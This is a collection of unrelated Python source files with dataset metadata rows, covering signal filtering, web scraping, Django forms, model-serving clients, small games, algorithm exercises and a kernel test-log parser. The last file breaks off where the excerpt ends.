    def new_sample(self, ms, ndata):
        """Feed one observed sample to the explorer.

        The sample is filtered against the previous one and its distance to
        all previously saved original samples is computed. If the average
        distance of the K nearest neighbours exceeds the configured number of
        standard deviations, the sample is appended to ``observations``.

        Parameters
        ----------
        ms : int
            Timestamp in milliseconds, e.g. ``int(round(time.time() * 1000))``.
        ndata : iterable
            N-dimensional vector of the current sample (length == inputdim).

        Returns
        -------
        float, bool
            Average Mahalanobis distance to the K nearest neighbours, and a
            flag saying whether the sample was added to the observations.
        """
        self.counter += 1
        for i, data in enumerate(ndata):
            self.axis[i].new_sample(ms, data)
        ## periodically recompute the mean and inverse covariance
        if self.counter % self.periodic_recompute == 0:
            self.compute_observations_mean_icov()
        ## get the last filtered sample from each axis and squash to 1D
        sample = np.array([self.axis[i].samples[-1] for i in range(self.inputdim)]).reshape(-1)
        ## distance of the sample to all stored observations
        distances = self.distance_to_observations(sample)
        distance_meank = np.mean(distances[:self.number_of_neighbour])
        added = False
        if (self.counter > self.start_buffer) and self.axis[0].full:
            ## keep the sample if further than number_of_stdev from previous observations
            if distance_meank > self.number_of_stdev:
                self.observations = np.vstack((self.observations, sample))
                added = True
        self.last_sample = sample
        return distance_meank, added

    def distance_to_observations(self, vector):
        """Return the sorted Mahalanobis distances of ``vector`` to all observations.

        https://en.wikipedia.org/wiki/Mahalanobis_distance
        """
        diff = self.observations - vector
        distances = np.sqrt(np.diag(np.dot(np.dot(diff, self.icov), diff.T)))
        return np.sort(distances)

    def compute_observations_mean_icov(self):
        """Recompute the mean and pseudo-inverse covariance of the observations."""
        self.mean = np.mean(self.observations, axis=0)
        if self.observations.shape[0] > 1:
            self.icov = np.linalg.pinv(np.cov((self.observations - self.mean).transpose()))
class AxisFilter:
    """Filter one unevenly sampled measurement axis.

    Interpolates at constant time steps of ``stepsize`` ms and runs a
    Savitsky-Golay fit of order ``order`` over a moving window of
    ``window`` samples.
    """

    def __init__(self, stepsize, order, window):
        """
        Parameters
        ----------
        stepsize : int
            Size of the interpolation step in milliseconds.
        order : int
            Dimension of the output vector (1 = position, 2 adds velocity, ...).
        window : int
            Size of the averaging window in samples.
        """
        self.stepsize = stepsize
        self.order = order
        self.interpolator = TimeInterpolator(stepsize)
        self.sgfitter = SavitskyGolayFitter(order, window)
        self.full = False

    def new_sample(self, time, value):
        """Interpolate the new measurement and fit every interpolated point.

        After the call, ``self.samples`` holds one fitted row per
        interpolated point and ``self.full`` mirrors the fitter's state.
        """
        fitted = np.empty((0, self.order))
        self.interpolator.new_sample(time, value)
        for interpolated in self.interpolator.value_steps:
            fitted = np.vstack((fitted, self.sgfitter.new_sample(interpolated)))
        self.samples = fitted
        self.full = self.sgfitter.full
class TimeInterpolator:
    """Linearly resample an uneven signal at a constant step size (in ms)."""

    def __init__(self, stepsize):
        self.stepsize = stepsize
        self.firstpoint = True

    def new_sample(self, time, value):
        """Interpolate between the previous sample and (time, value).

        Results are exposed through ``time_steps`` and ``value_steps``; the
        very first sample is passed through unchanged.
        """
        if not self.firstpoint:
            grid = np.arange(self.last_time, time, self.stepsize)
            self.time_steps = grid
            self.value_steps = np.interp(grid,
                                         [self.last_time, time],
                                         [self.last_value, value])
        else:
            self.firstpoint = False
            self.time_steps = np.array([time])
            self.value_steps = np.array([value])
        self.last_time = time
        self.last_value = value
class SavitskyGolayFitter:
    """Savitzky-Golay smoother/differentiator implemented as a bank of FIR filters.

    Row i of the coefficient matrix estimates the i-th polynomial coefficient
    (position, velocity, ...) over the moving window.
    """

    def __init__(self, order=4, window=30):
        self.order = order
        if window % 2 == 0:
            window = window + 1  # the window length must be odd
        self.window = window
        # compute the savitzky-golay differentiators
        sgolay = self.savitzky_golay(order, window)
        self.sgolay_diff = []
        self.buffers = []
        self.samples = 0
        self.full = False
        # create one FIR filter per derivative order
        for i in range(order):
            self.sgolay_diff.append(np.ravel(sgolay[i, :]))
            self.buffers.append(IIRFilter(self.sgolay_diff[i], [1]))

    def new_sample(self, x):
        """Push one sample through every differentiator; return the fitted vector."""
        self.samples = self.samples + 1
        if self.samples > self.window:
            self.full = True  # the window has been filled at least once
        fits = np.zeros((self.order,))
        # Idiom fix: enumerate replaces the manual counter flagged by the
        # original "use enumerate or map" comment.
        for i, fir in enumerate(self.buffers):
            fits[i] = fir.filter(x)
        return fits

    # Savitzky-Golay coefficient computation
    def savitzky_golay(self, order=2, window=30):
        """Return the pseudo-inverse of the Vandermonde design matrix.

        Raises
        ------
        TypeError
            If the window size is not a positive odd number, or is too small
            for the requested polynomial order.
        """
        if window is None:
            window = order + 2
        if window % 2 != 1 or window < 1:
            raise TypeError("window size must be a positive odd number")
        if window < order + 2:
            raise TypeError("window size is too small for the polynomial")
        # A second order polynomial has 3 coefficients
        order_range = range(order + 1)
        half_window = (window - 1) // 2
        # Vandermonde design matrix; np.array replaces the deprecated np.mat
        # (removed interface in recent NumPy), with identical values.
        B = np.array([[k ** i for i in order_range]
                      for k in range(-half_window, half_window + 1)])
        M = np.linalg.pinv(B)
        return M
class IIRFilter:
    """Direct-form IIR filter defined by feedforward (B) and feedback (A) coefficients."""

    def __init__(self, B, A):
        """Create an IIR filter, given the B and A coefficient vectors."""
        self.B = B
        self.A = A
        # Keep at least three previous outputs even for short A vectors.
        history = len(A) - 1 if len(A) > 2 else 3
        self.prev_outputs = Ringbuffer(history)
        self.prev_inputs = Ringbuffer(len(B))

    def filter(self, x):
        """Take one sample, filter it, and return the output."""
        self.prev_inputs.new_sample(x)
        acc = 0
        for k, b in enumerate(self.B):
            acc = acc + b * self.prev_inputs.reverse_index(k)
        for k, a in enumerate(self.A[1:]):
            acc = acc - a * self.prev_outputs.reverse_index(k)
        acc = acc / self.A[0]
        self.prev_outputs.new_sample(acc)
        return acc

    def new_sample(self, x):
        """Alias for filter() so the object matches the fitter interface."""
        return self.filter(x)
class Ringbuffer:
    """Fixed-size circular buffer that tracks a running sum of its contents."""

    def __init__(self, size, init=0):
        """Create a buffer of ``size`` slots pre-filled with ``init``.

        Raises
        ------
        ValueError
            If size < 1. (Bug fix: the original called a non-existent
            ``throw()`` helper, which would have raised NameError instead.)
        """
        if size < 1:
            raise ValueError("Invalid size for a ringbuffer: must be >=1")
        self.n_samples = size
        self.samples = np.ones((size,)) * init
        self.read_head = 1
        self.write_head = 0
        # Bug fix: start the running sum consistent with the initial fill
        # (the original always started at 0, even for init != 0).
        self.sum = float(init) * size

    def get_length(self):
        """Return the buffer capacity."""
        return self.n_samples

    def get_samples(self):
        """Return the contents ordered from oldest to newest."""
        return np.hstack((self.samples[self.read_head - 1:], self.samples[0:self.read_head - 1]))

    def get_sum(self):
        """Return the running sum of the buffered values."""
        return self.sum

    def get_output(self):
        """Return the oldest buffered value (the delay-line output)."""
        return self.samples[self.read_head - 1]

    def get_mean(self):
        """Return the mean of the buffered values."""
        return self.sum / float(self.n_samples)

    def forward_index(self, i):
        """Return the i-th value counting forward from the oldest."""
        new_index = self.read_head + i - 1
        new_index = new_index % self.n_samples
        return self.samples[new_index]

    def reverse_index(self, i):
        """Return the i-th value counting backward from the newest."""
        new_index = self.write_head - i - 1
        while new_index < 0:
            new_index += self.n_samples
        return self.samples[new_index]

    def new_sample(self, x):
        """Insert x, evicting and returning the oldest stored value."""
        evicted = self.samples[self.write_head]
        self.samples[self.write_head] = x
        # Bug fix: subtract the value actually evicted. The original
        # subtracted samples[read_head], which is only overwritten on the
        # NEXT push, leaving the running sum stale by one element.
        self.sum += x
        self.sum -= evicted
        self.read_head = (self.read_head + 1) % self.n_samples
        self.write_head = (self.write_head + 1) % self.n_samples
        return evicted
| true |
00582004e5397ac8064b355e0019f89538d9061b | Python | FitCoderOfficial/Bible_Scraper | /instagram.py | UTF-8 | 1,150 | 2.515625 | 3 | [] | no_license | from selenium import webdriver
from bs4 import BeautifulSoup
import numpy as np
import pandas as pd
import requests
import time
import json
import os
import csv

# For Chrome: point selenium at the chromedriver binary downloaded earlier.
driver = webdriver.Chrome('D:\Works\PG_Works\Bible_Scraper\chromedriver')
# Implicitly wait up to 3 seconds for web resources to load.
driver.implicitly_wait(3)
# Navigate to the profile URL.
driver.get('https://www.instagram.com/xxxibgdrgn')
#driver.get('https://wol.jw.org/en')

# Fetch the current page again with requests and parse it.
current_link = driver.current_url
req = requests.get(current_link)
r = req.text
soup = BeautifulSoup(r, 'html.parser')
# follower = soup.select('meta', {'name': 'description'})['content']
# for i in follower:
#     print(i.get_text())
# print (follower)

# Extract follower/following counts by slicing the JSON blob embedded in the
# page source between the hard-coded start/end markers.
# NOTE(review): mixing r.find for the start with r.rfind for the end is
# fragile; confirm these markers still exist in Instagram's markup.
start = '"edge_followed_by":{"count":'
end = '},"followed_by_viewer"'
followers= r[r.find(start)+len(start):r.rfind(end)]
start = '"edge_follow":{"count":'
end = '},"follows_viewer"'
following= r[r.find(start)+len(start):r.rfind(end)]
text_verified = 'Verified'
# NOTE(review): this indexes a single character, not a boolean — verify intent.
isVerified = r[r.find(text_verified)]
print(followers, following, )
| true |
05810cd900ba6aa894357bb25b570c601ae0a660 | Python | jeroenarens/Apps4Ghent_Bib | /Apps4Ghent_Library/apps4ghent/forms.py | UTF-8 | 626 | 2.703125 | 3 | [] | no_license | from django import forms
# Form used for the REC: lets the visitor choose a birth decade, a sex
# (M/F) and a book category.
DECADE_CHOICES = [(1940,'1940'),(1950,'1950'),(1960,'1960'),(1970,'1970'),(1980,'1980'),(1990,'1990'),(2000,'2000')]
# NOTE(review): 'V' is presumably Dutch "vrouw" (female) — values likely
# match the underlying library dataset; confirm before changing.
SEX_CHOICES = [('M','Male'),('V','Female')]
CATEGORY_CHOICES = [('fictie','Fiction'),('non-fictie', 'Non-fiction')]

class booksform(forms.Form):
    # Required dropdowns for the reader's birth decade, sex and book category.
    decade = forms.ChoiceField(required=True, choices=DECADE_CHOICES)
    sex = forms.ChoiceField(required=True, choices=SEX_CHOICES)
    category = forms.ChoiceField(required=True, choices=CATEGORY_CHOICES)
| true |
570606e8d44b01b11f6c84f8583ce195c70224cf | Python | harshi12/AI_On_The_Edge_Platform | /models/iris/app/predict_cl.py | UTF-8 | 1,097 | 2.796875 | 3 | [] | no_license | import pandas as pd
import json
import sys
import requests

# Path to the test CSV is passed as the first CLI argument.
test_data = sys.argv[1]
IP = input("Enter server IP:")
# Drop the header row and the trailing label column; keep the 4 features.
test_data = pd.read_csv(test_data, header = None)
test_data = test_data.iloc[1:,:-1]
# Build the TF-Serving "predict" request body, one instance per row.
request_str = {"signature_name": "predict","instances":[]}
for index,row in test_data.iterrows():
    temp = {"sepal_length":[float(row[0])],"sepal_width":[float(row[1])],"petal_length":[float(row[2])],"petal_width":[float(row[3])]}
    request_str['instances'].append(temp)
data = json.dumps(request_str)
headers = {"content-type": "application/json"}
# POST to the TensorFlow Serving REST endpoint on port 9500.
json_response = requests.post('http://'+IP+':9500/v1/models/iris:predict', data=data, headers=headers)
json_response = json.loads(str(json_response.text))
f = open('predictions.txt', 'w')
print(json_response)
ans = json_response["predictions"]
# Map the predicted class index to a species name; print and log each one.
for i in range(len(ans)):
    if ans[i]['classes'] == ['0']:
        print('Iris-Setosa')
        f.write('Iris-Setosa\n')
    elif ans[i]['classes'] == ['1']:
        print('Iris-Virginica')
        f.write('Iris-Virginica\n')
    elif ans[i]['classes'] == ['2']:
        print('Iris-Versicolor')
        f.write('Iris-Versicolor\n')
f.close()
| true |
f53f9489a17f55be8659df1a8cc472a3cdfdd7e2 | Python | rcc-uchicago/rcc-intro | /scripts/python_pool.py | UTF-8 | 374 | 3.046875 | 3 | [] | no_license | '''
A simple code to demonstrate how to use multiple cores to speed up
a program.
This code is going to use 4 cores to calculate eigen vectors of 4 random matrices.
'''
import numpy
from multiprocessing import Pool
from itertools import repeat

num_cores = 4

def run_parallel_eig(num_cores=4, size=1000):
    """Eigendecompose `num_cores` independent random matrices in parallel.

    Bug fixes vs. the original script:
    - itertools.repeat() reused ONE random matrix, contradicting the module
      docstring ("4 random matrices"); distinct matrices are now generated.
    - the Pool is now closed via a context manager instead of leaking.
    - the work runs under a __main__ guard, which multiprocessing requires
      on spawn-based platforms (Windows/macOS).

    Returns the list of (eigenvalues, eigenvectors) pairs.
    """
    matrices = [numpy.random.rand(size, size) for _ in range(num_cores)]
    with Pool(num_cores) as pool:
        return pool.map(numpy.linalg.eig, matrices)

if __name__ == '__main__':
    run_parallel_eig(num_cores=4, size=1000)
| true |
eff1e16cd1e32684d38179c9a24f395df1805f32 | Python | xulzee/LeetCodeProjectPython | /48. Rotate Image.py | UTF-8 | 1,657 | 3.609375 | 4 | [] | no_license | # -*- coding: utf-8 -*-
# @Time : 2019/2/27 16:02
# @Author : xulzee
# @Email : xulzee@163.com
# @File : 48. Rotate Image.py
# @Software: PyCharm
from typing import List
class Solution:
    """In-place 90-degree clockwise rotation of an n x n matrix (LeetCode 48)."""

    def rotate1(self, matrix: List[List[int]]) -> None:
        """Rotate by transposing, then reversing each row. Modifies matrix in place."""
        for r in range(len(matrix)):
            for c in range(r + 1, len(matrix[0])):
                matrix[r][c], matrix[c][r] = matrix[c][r], matrix[r][c]
            matrix[r] = matrix[r][::-1]

    def rotate(self, matrix: List[List[int]]) -> None:
        """Rotate ring by ring, from the outermost layer inwards."""
        top = left = 0
        bottom = right = len(matrix) - 1
        while top < bottom:
            self.rotateEdge(matrix, top, left, bottom, right)
            top, left = top + 1, left + 1
            bottom, right = bottom - 1, right - 1

    def rotateEdge(self, matrix: list, start_row: int, start_column: int, end_row: int, end_column: int) -> None:
        """Cycle the four edges of one ring one position clockwise."""
        for offset in range(end_row - start_row):
            saved = matrix[start_row][start_column + offset]
            matrix[start_row][start_column + offset] = matrix[end_row - offset][start_column]
            matrix[end_row - offset][start_column] = matrix[end_row][end_column - offset]
            matrix[end_row][end_column - offset] = matrix[start_row + offset][end_column]
            matrix[start_row + offset][end_column] = saved
if __name__ == '__main__':
    # Demo: rotate the LeetCode 4x4 example clockwise and print the result.
    A = [
        [5, 1, 9, 11],
        [2, 4, 8, 10],
        [13, 3, 6, 7],
        [15, 14, 12, 16]
    ]
    # Solution().rotate(A)
    Solution().rotate(A)
    print(A)
| true |
790b32a9dbdb61babbaf6fd8b50965556f98b31d | Python | adrn/longslit | /scripts/init_pipeline.py | UTF-8 | 2,466 | 2.6875 | 3 | [
"MIT"
] | permissive | # coding: utf-8
""" Initialize the 1D spectral reduction pipeline. """
# Standard library
import os
from os.path import abspath, expanduser, exists, join
import sys
# Third-party
import yaml
# Package
from longslit.log import logger
def main(name, rootpath):
    """Create the pipeline output directory and write a template global config.

    Parameters
    ----------
    name : str
        Name of this reduction pipeline run.
    rootpath : str
        Root directory containing the data files; '~' is expanded.

    Raises
    ------
    IOError
        If ``rootpath`` does not exist.

    Exits with status 1 (without overwriting) if a config file already
    exists for this pipeline name.
    """
    rootpath = abspath(expanduser(rootpath))
    if not exists(rootpath):
        raise IOError("Path '{}' doesn't exist!".format(rootpath))
    pipeline_path = join(rootpath, 'longslit', name)
    os.makedirs(pipeline_path, exist_ok=True)
    logger.debug('Pipeline output path: {}'.format(pipeline_path))
    global_config_filename = join(pipeline_path, '{}-config.yml'.format(name))
    if exists(global_config_filename):
        logger.error("Config file already exists at '{}'\n ignoring..."
                     .format(global_config_filename))
        sys.exit(1)
    # Template configuration values the user is expected to edit by hand.
    defaults = dict()
    defaults['name'] = name
    defaults['dispersion_axis'] = 0
    defaults['overscan'] = 0
    defaults['path_exclude'] = ['']
    defaults['path_include'] = ['']
    defaults['gain'] = '2.7 electron/adu'
    defaults['read_noise'] = '7.9 electron'
    with open(global_config_filename, 'w') as f:
        yaml.dump(defaults, f)
    logger.info('Created template pipeline global config file at: {}'
                .format(global_config_filename))
    for k, v in defaults.items():
        logger.debug('{} = {}'.format(k, v))
if __name__ == "__main__":
from argparse import ArgumentParser
import logging
# Define parser object
parser = ArgumentParser(description="")
parser.add_argument("-v", "--verbose", action="store_true", dest="verbose",
default=False, help="Be chatty! (default = False)")
parser.add_argument("-q", "--quiet", action="store_true", dest="quiet",
default=False, help="Be quiet! (default = False)")
parser.add_argument("-n", "--name", dest="name", required=True, type=str,
help="The name of this reduction pipeline run.")
parser.add_argument("--rootpath", dest="rootpath", required=True,
type=str, help="Path to root directory containing data files.")
args = parser.parse_args()
# Set logger level based on verbose flags
if args.verbose:
logger.setLevel(logging.DEBUG)
elif args.quiet:
logger.setLevel(logging.ERROR)
else:
logger.setLevel(logging.INFO)
main(name=args.name, rootpath=args.rootpath)
| true |
5b376b580bd83c28d60cc0883c1135bf03e0d83f | Python | noika/pyladies.hw | /210piskvorky.py | UTF-8 | 220 | 3.375 | 3 | [] | no_license | pole = 20*"-"
def tah(pole, cislo_policka, symbol):
    """Return the board with `symbol` placed at 1-indexed position `cislo_policka`."""
    # Bug fix: the tail slice must resume at `cislo_policka` (not +1);
    # the original dropped one character, shrinking the board for every
    # position except the last.
    return pole[:cislo_policka-1] + symbol + pole[cislo_policka:]
# Demo: place "o" on the last (20th) square and show the board.
print(tah(pole, 20, "o"))
| true |
9a843afc20d497970d2d2856260e7a6936fa7be3 | Python | trevor91/algorithm | /beakjoon/9376.py | UTF-8 | 1,801 | 2.875 | 3 | [] | no_license | import sys, re
from heapq import heappush, heappop
# Fast-input helper: read one raw line from stdin.
read = lambda: sys.stdin.readline()
def check(x, y):
    """Return True when cell (x, y) lies on the border of the w x h grid.

    x indexes columns in [0, w); y indexes rows in [0, h).
    """
    # Bug fix: the row bound must use the grid height h; the original
    # compared y against w-1, which is wrong for non-square grids.
    if x == 0 or y == 0 or x == w - 1 or y == h - 1:
        return True
    return False
def go(i):
    """Dijkstra-style search (ordered by walls broken) for prisoner i.

    Returns (walls_broken, x, y) at the first reachable goal cell: either a
    border cell, or (for i == 1) any cell already visited by prisoner 0.
    Mutates the shared `prisoners` heap and `visited` sets. (Debug print
    removed: it corrupted the judged output.)
    """
    while prisoners:
        wall, (cur_x, cur_y) = heappop(prisoners)
        if check(cur_x, cur_y):
            return (wall, cur_x, cur_y)
        if i == 1 and (cur_x, cur_y) in visited[0]:
            return (wall, cur_x, cur_y)
        for calc_x, calc_y in zip(move_x, move_y):
            pre_x = calc_x + cur_x
            pre_y = calc_y + cur_y
            # Bug fix: bounds-check the CANDIDATE cell pre_x; the original
            # tested cur_x >= 0 (always true), so pre_x == -1 silently
            # wrapped to the last column via negative indexing.
            if pre_x >= 0 and pre_y >= 0 and pre_x < w and pre_y < h:
                if not (pre_x, pre_y) in visited[i]:
                    if (blueprint[pre_y][pre_x] == '.') or (blueprint[pre_y][pre_x] == '$'):
                        heappush(prisoners, (wall, (pre_x, pre_y)))
                    elif blueprint[pre_y][pre_x] == '#':
                        heappush(prisoners, (wall + 1, (pre_x, pre_y)))
                    visited[i].add((pre_x, pre_y))
if __name__ == '__main__':
    # One test case per line count given on the first line of stdin.
    testcase = int(read().strip())
    move_x = [0,0,1,-1]
    move_y = [1,-1,0,0]
    for _ in range(testcase):
        h, w = map(int,read().split())
        blueprint = []
        first_prisoners = []
        prisoners = []
        visited = [set(),set()]
        for i in range(h):
            temp = read().strip()
            blueprint.append([x for x in temp])
            # Record every prisoner '$' as a start cell with 0 walls broken.
            prisoner = [t.start() for t in re.finditer('\$',temp)]
            for j in prisoner:
                first_prisoners.append((0,(j,i)))
        rst = 0
        for i, data in enumerate(first_prisoners):
            heappush(prisoners, data)
            visited[i].add(data[1])
            temp, x, y = go(i)
            if i == 0:
                # NOTE(review): this pruning loop never updates (x, y), so
                # unless (x, y) == data[1] on entry it spins forever; the
                # retracing logic appears unfinished.
                temp_set = set()
                while True:
                    if (x, y) == data[1]:
                        break
                    for calc_x, calc_y in zip(move_x, move_y):
                        if (calc_x + x, calc_y + y) in visited[0]:
                            temp_set.add((calc_x + x, calc_y + y))
                    # NOTE(review): debug print — breaks judged output.
                    print('temp: ' ,temp_set)
                    visited[0].intersection_update(temp_set)
            rst += temp
        print(rst)
4147bf499a6ae26cdf23d08897df9958417c2b37 | Python | MtTsai/Leetcode | /python/131.palindrome_partitioning.py | UTF-8 | 520 | 3.171875 | 3 | [] | no_license | class Solution(object):
def partition(self, s):
"""
:type s: str
:rtype: List[List[str]]
"""
out = []
def find(string, curr, out):
if string == '':
out.append(curr)
else:
for i in range(len(string)):
subs = string[:i + 1]
if subs == subs[::-1]:
find(string[i + 1:], curr + [subs], out)
find(s, [], out)
return out
| true |
949982f9039d9f4dbbf3fd0a6e08e47382434247 | Python | kcc/sanitizers | /address-sanitizer/tools/kernel_test_parse.py | UTF-8 | 5,493 | 2.65625 | 3 | [
"NCSA",
"MIT",
"LLVM-exception",
"Apache-2.0"
] | permissive | """
Parser for unit test output in kernel logs.
Each test should write special messages to kernel log:
##### TEST_START <test_name> denotes the beginning of the test log
##### TEST_END <test_name> denotes the finnish of the test log
##### FAIL <reason> denotes the test failed
##### ASSERT '<regex>' - we should search for the regex in other lines of the
test's output. If it's not found, the test fails
"""
import re
import sys
import difflib
import argparse
# Markers emitted by the kernel unit tests (see the module docstring).
TEST_START_RE = re.compile(r"##### TEST_START (.*)$")
TEST_END_RE = re.compile(r"##### TEST_END (.*)$")
ASSERT_RE = re.compile(r"##### ASSERT '(.*)'")
FAIL_RE = re.compile(r"##### FAIL (.*)$")

parser = argparse.ArgumentParser(
    description = "Parser for unit kernel test logs from input",
    usage = "dmesg | test_parse.py [options]")
# Help-string fix: "onlu" -> "only", and the unbalanced parenthesis closed.
parser.add_argument("--brief", action = "store_true",
    help = "Brief output (only PASSED or FAILED for each test)")
parser.add_argument("--failed_log", action = "store_true",
    help = "output full log for failed tests")
parser.add_argument("--assert_candidates", type = int, metavar = "N",
    help = "output N closest candidates to fit the failed assert.")
parser.add_argument("--annotate", action = "store_true",
    help = "special output for buildbot annotator")
parser.add_argument("--allow_flaky", nargs = '*', metavar = "name",
    help = "allow the listed tests to be flaky")
args = parser.parse_args()
def ExtractTestLogs(kernel_log):
    """Split a kernel log stream into (test_name, [stripped lines]) chunks.

    Lines between TEST_START and TEST_END markers (exclusive) are collected
    under the test name; everything outside the markers is ignored.
    """
    all_tests = []
    current_test_lines = []
    current_test = None
    # Bug fix: iterate the kernel_log argument. The original ignored the
    # parameter and always read sys.stdin directly.
    for line in kernel_log:
        l = line.strip()
        if current_test:
            if TEST_END_RE.search(l):
                all_tests.append((current_test, current_test_lines))
                current_test = None
                current_test_lines = []
            else:
                current_test_lines.append(l)
        else:
            m = TEST_START_RE.search(l)
            if m:
                current_test = m.group(1)
    return all_tests
def FindFailures(lines):
    """Collect the failure reasons reported by '##### FAIL <reason>' lines."""
    return [m.group(1) for m in (FAIL_RE.search(l) for l in lines) if m]
def FindAssertFailures(lines):
    """Return patterns from '##### ASSERT <regex>' lines matched by no other line.

    A pattern counts as satisfied when it matches any line of the test log
    that is not itself an ASSERT line.
    """
    # Hoisted: the set of candidate (non-assert) lines is identical for every
    # assert, so compute it once instead of rescanning per pattern (O(n^2)).
    candidates = [l for l in lines if not ASSERT_RE.search(l)]
    failed_asserts = []
    for l in lines:
        m = ASSERT_RE.search(l)
        if not m:
            continue
        current_assert_re = re.compile(m.group(1))
        if not any(current_assert_re.search(c) for c in candidates):
            failed_asserts.append(current_assert_re.pattern)
    return failed_asserts
def PrintTestReport(test, run_reports):
passed = 0
failed = 0
for result, _, _, _ in run_reports:
if result:
passed += 1
else:
failed += 1
if passed and not failed:
total_result = "PASSED (%d runs)" % passed
elif failed and not passed:
total_result = "FAILED (%d runs)" % failed
else:
total_result = "FLAKY (%d passed, %d failed, %d total)" % (
passed, failed, passed + failed)
print "TEST %s: %s" % (test, total_result)
if args.brief:
return
for index, (_, failures, failed_asserts, lines) in enumerate(run_reports):
if not failures and not failed_asserts:
continue
print " Run %d" % index
for f in failures:
print " Failed: %s" % s
missing_matches = not args.assert_candidates
for a in failed_asserts:
print " Failed assert: %s" % a
if args.assert_candidates:
print " Closest matches:"
matches = difflib.get_close_matches(a, lines, args.assert_candidates, 0.4)
matches = [match for match in matches if not ASSERT_RE.search(match)]
for match in matches:
print " " + match
if not matches:
missing_matches = True
if args.failed_log and (failures or missing_matches):
print " Test log:"
for l in lines:
print " " + l
def PrintBuildBotAnnotation(passed, failed, flaky, flaky_not_allowed):
    # Emit buildbot-annotator directives summarizing the run; the step is
    # marked failed when nothing ran, anything failed, or a test was flaky
    # without being whitelisted.
    if not passed and not failed and not flaky:
        print "@@@STEP_TEXT: NO TESTS WERE RUN@@@"
        print "@@@STEP_FAILURE@@@"
    print "@@@STEP_TEXT@tests:%d passed:%d failed:%d flaky:%d@@@" % (passed + failed + flaky, passed, failed, flaky)
    if failed or flaky_not_allowed:
        print "@@@STEP_FAILURE@@@"
def GroupTests(tests):
    """Group (test_name, lines) pairs into {test_name: [lines, ...]}.

    Insertion order of each test's runs is preserved.
    """
    grouped = {}
    for name, lines in tests:
        grouped.setdefault(name, []).append(lines)
    return grouped
def main():
    """Read the kernel log from stdin, aggregate per-test results, report."""
    all_tests = ExtractTestLogs(sys.stdin)
    grouped_tests = GroupTests(all_tests)
    total_passed = 0
    total_failed = 0
    total_flaky = 0
    flaky_not_allowed = False
    # Python 2: dict.iteritems().
    for test, runs in grouped_tests.iteritems():
        passed = 0
        failed = 0
        run_reports = []
        for lines in runs:
            failed_asserts = FindAssertFailures(lines)
            failures = FindFailures(lines)
            if failed_asserts or failures:
                failed += 1
            else:
                passed += 1
            run_reports.append((not failed_asserts and not failures, failures, failed_asserts, lines))
        # A test is flaky when it both passed and failed across runs.
        if passed and not failed:
            total_passed += 1
        elif failed and not passed:
            total_failed += 1
        else:
            total_flaky += 1
            if not args.allow_flaky or (test not in args.allow_flaky):
                flaky_not_allowed = True
        PrintTestReport(test, run_reports)
    if args.annotate:
        PrintBuildBotAnnotation(total_passed, total_failed, total_flaky, flaky_not_allowed)

if __name__ == '__main__':
    main()
| true |
7b4f644a64edbb4d68c1b47e5c2112a26f082756 | Python | rpural/DailyCodingProblem | /Daily Coding Problem/findPatterns.py | UTF-8 | 579 | 3.6875 | 4 | [] | no_license | #! /usr/bin/env python3
''' Daily Coding Problem
This problem was asked by Microsoft.
Given a string and a pattern, find the starting indices of all occurrences of
the pattern in the string. For example, given the string "abracadabra" and the
pattern "abr", you should return [0, 7].
'''
import re
# Example inputs from the problem statement; expected answer is [0, 7].
teststring = "abracadabra"
searchstring = "abr"
def matches(search, test):
    """Return the start index of every (non-overlapping) occurrence of `search` in `test`."""
    return [found.start() for found in re.finditer(search, test)]
if __name__ == "__main__":
print( matches( searchstring, teststring) )
| true |
8d45c718874bf3177a788ebde3f04f05645cee83 | Python | Shashvat6264/flappy_bird | /sprites.py | UTF-8 | 1,720 | 3.078125 | 3 | [] | no_license | # Sprite classes for the platformer game
import pygame as pg
import random
from settings import *
from graphics import *
class Player(pg.sprite.Sprite):
    """The player-controlled bird sprite with a timer-driven frame animation."""

    def __init__(self, game):
        pg.sprite.Sprite.__init__(self)
        self.game = game
        self.g = Graphics()
        # NOTE(review): this Surface is immediately replaced by the first
        # animation frame on the next line; the allocation looks redundant.
        self.image = pg.Surface((70,70))
        self.image = self.g.bird_anim[0]
        self.frame = 0
        self.frame_rate = 500  # milliseconds between animation frames
        self.last_update = pg.time.get_ticks()
        # self.image.fill(BLUE)
        self.rect = self.image.get_rect()
        self.rect.center = (WIDTH/2,HEIGHT/2)

    def update(self, x, y):
        # Position is driven externally via (x, y); the animation frame
        # advances on its own timer.
        self.rect.x = x
        self.rect.y = y
        now = pg.time.get_ticks()
        # NOTE(review): last_update is never reset after a frame change, so
        # once the threshold is crossed the animation advances every tick —
        # confirm whether that is intended.
        if now - self.last_update > self.frame_rate:
            self.frame += 1
            if self.frame == len(self.g.bird_anim):
                self.frame = 0
            else:
                center = self.rect.center
                self.image = self.g.bird_anim[self.frame]
                self.rect = self.image.get_rect()
                self.rect.center = center
class Mob(pg.sprite.Sprite):
    """An obstacle that scrolls right-to-left and respawns at the right edge."""

    def __init__(self, game, x):
        pg.sprite.Sprite.__init__(self)
        self.image = pg.Surface((50, random.randint(HEIGHT/4, HEIGHT*3/4)))
        self.image.fill(RED)
        self.rect = self.image.get_rect()
        self.rect.x = x
        self.rect.y = random.randint(HEIGHT/10, HEIGHT*9/10)
        self.velx = 10
        self.game = game

    def update(self):
        if self.rect.x <= 0:
            # Off screen: spawn a replacement on the right, remove this one
            # and award a point.
            replacement = Mob(self.game, WIDTH)
            self.game.all_sprites.add(replacement)
            self.game.mobs.add(replacement)
            self.kill()
            self.game.score += 1
        else:
            self.rect.x -= self.velx
5ff459002d8930742ff638ea1063a8ac70c2c602 | Python | brunadelmourosilva/cursoemvideo-python | /mundo2/ex054_idade.py | UTF-8 | 630 | 4.1875 | 4 | [] | no_license | #Exercício Python 54: Crie um programa que leia o ano de nascimento de sete pessoas.
# At the end, show how many people are still minors and how many are adults.
from datetime import date
atual = date.today().year  # current year
contJovem = 0   # count of people under 18
contAdulto = 0  # count of adults (18 or older)
for i in range(1, 7+1):
    y = int(input('Insira o ano de nascimento da pessoa {}: '.format(i)))
    idade = atual - y
    if idade >= 18:
        contAdulto += 1
    else:
        contJovem += 1
print('\033[1;35;40m {} \033[m pessoa não copletaram 18 anos.'. format(contJovem))
print('\033[1;31;44m {} \033[m pessoas já copletaram 18 anos.'. format(contAdulto))
ab010a0525dc5cb56da30839259a7157551ca887 | Python | OnaiNet/rgt_3.14 | /bwilkes/code/CreateAndSendJson.py | UTF-8 | 498 | 2.578125 | 3 | [] | no_license | import sys
import json
import requests
def build_payload(args):
    """Return the JSON document {"message": "<args joined by ', '>"}.

    Robustness fix: json.dumps handles quoting and escaping, replacing the
    original manual string concatenation plus bracket/quote stripping of
    str(list) output, which produced invalid JSON for arguments containing
